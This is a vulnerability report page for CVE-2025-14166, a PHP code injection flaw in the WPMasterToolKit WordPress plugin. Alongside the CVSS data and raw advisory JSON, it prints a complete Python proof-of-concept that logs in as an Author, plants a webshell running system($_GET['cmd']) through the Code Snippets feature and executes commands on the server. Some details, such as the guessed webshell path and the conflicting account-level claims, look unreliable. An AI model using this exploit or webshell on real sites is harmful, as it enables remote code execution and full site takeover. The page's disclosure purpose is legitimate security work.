Security Vulnerability Report
中文
CVE-2025-14166 CVSS 5.3 MEDIUM

CVE-2025-14166

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPMasterToolKit WordPress插件 <= 2.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2025-14166 PoC - WPMasterToolKit PHP Code Injection # Target: WordPress site with WPMasterToolKit plugin <= 2.13.0 # Authenticated exploitation (Author role or higher) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "author_user" PASSWORD = "author_password" def login(session, target_url, username, password): """Authenticate to WordPress with Author-level account""" login_url = f"{target_url}/wp-login.php" data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=data, allow_redirects=True) return 'wordpress_logged_in' in session.cookies.get_dict() def create_malicious_snippet(session, target_url): """Create PHP code snippet for RCE via eval()""" # Path to WPMasterToolKit Code Snippets module snippet_url = f"{target_url}/wp-admin/admin.php?page=wpmt-code-snippets" # Malicious PHP payload - creates webshell payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" data = { 'action': 'create', 'title': 'Malicious Snippet', 'code': payload, 'status': 'active' } response = session.post(snippet_url, data=data) return response.status_code == 200 def execute_command(session, target_url, command): """Execute system command via injected webshell""" webshell_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/snippets.php?cmd={command}" response = session.get(webshell_url) return response.text def main(): session = requests.Session() print("[*] Logging in to WordPress...") if not login(session, TARGET_URL, USERNAME, PASSWORD): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") print("[*] Creating malicious PHP snippet...") if create_malicious_snippet(session, TARGET_URL): print("[+] Snippet created and activated!") print("[*] Executing command: whoami") result = execute_command(session, TARGET_URL, "whoami") print(f"[+] Result: {result}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14166", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:49.257", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L628", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L628", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/log/wpmastertoolkit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6049996a-514a-44f7-9878-4aa43598842a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.